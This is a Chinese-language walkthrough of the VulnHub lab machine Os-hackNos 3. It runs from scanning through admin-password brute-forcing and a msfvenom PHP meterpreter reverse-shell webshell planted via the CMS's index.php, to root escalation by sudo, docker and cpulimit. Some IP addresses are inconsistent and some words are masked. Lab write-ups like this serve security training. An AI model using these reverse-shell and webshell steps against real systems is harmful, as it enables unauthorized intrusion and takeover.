vulhub:Os-hackNos 3
0x00基本信息
靶机下载地址:
Download: https://drive.google.com/open?id=1zWTU6BFXPmS8BDeoVc766FwUJQZ4-_RT
Download (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova
Download (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova.torrent ( Magnet)
靶机描述:
Back to the Top
Difficulty: Intermediate
Flag: 2 Flag first user And the second root
Learning: Web Application | Enumeration | Privilege Escalation
Web-site: www.hacknos.com
Contact-us : @rahul_gehlaut
This may work better with VirtualBox rather than VMware
0x01信息收集
kali:192.168;56.102
靶机:192.168.56.104
端口扫描:
目录扫描:
访问80端口:
访问刚刚目录扫描的script,没有有利用的地方:
在去访问刚刚页面提到的websec,又出现一个页面,在对这个目录进行遍历,同时在这个页面还发现一个邮箱 aaa@qq.com :
看到有一个amdin目录,知道找到后台登录页面了,访问一下:
0x02漏洞利用
使用账号:aaa@qq.com 密码:kali自带 进行**,没有**成功
使用cewl爬取http://192.168.56.104/websec页面,生成字典
在使用刚刚生成的密码进行**,但是很快就被封掉了
最后改一下bp,得到密码为Securityx
尝试登陆后台:
查看后台功能,发现在content中管理web页面:
使用msfvenom:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=1234 -f raw > webshell.php
在msf设置好监听:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.36
set lport 1234
run
访问一直报错
然后去掉webshell中的 /*,同时在文件中新建一个shell目录,再次上传webshell,在通过index.php来包含文件:
<?php
/*!
* Gila CMS
* Copyright 2017-19 Vasileios Zoumpourlis
* Licensed under BSD 3-Clause License
*/
include 'src/core/bootstrap.php';
include 'shell/webshell.php';
?>
在访问主页面,就可以反弹shell:
在使用python,获取一个交互的tty:
python -c ‘import pty; pty.spawn("/bin/bash")’
然后查看文件,在/home/blackdevil找到flag
0x03提权
1、使用脚本查找提权方式
2、手动查找具有root权限的可执行文件
3、查找具有账户密码
前面2个步骤没有发现东西,然后看了其他文章,在database
解密地址:http://www.spammimic.com/spreadsheet.php?action=decode
用户:blacKdevil 密码:aaa@qq.com@
sudo su - 提权
docker提权
1、下载文件导入:
下载地址:http://dl-cdn.alpinelinux.org/alpine/v3.11/releases/aarch64/
2、构建的Dockfile(直接在kali里面写好在导入的):
3、构建镜像:
4、提取,执行文件,但是在执行文件的时候没有成功
cpulimit提权
1、把文件编译好,放到靶机:
wget下载可执行文件到靶机上并通过cpulimit执行
0x04总结&问题&知识点
1、docker提权:
https://www.hackingarticles.in/docker-privilege-escalation/
https://www.freebuf.com/articles/system/170783.html
2、搭建镜像的方法:
https://www.cnblogs.com/cocowool/p/make_your_own_base_docker_image.html
参考文章:
https://blog.csdn.net/weixin_44214107/article/details/104039918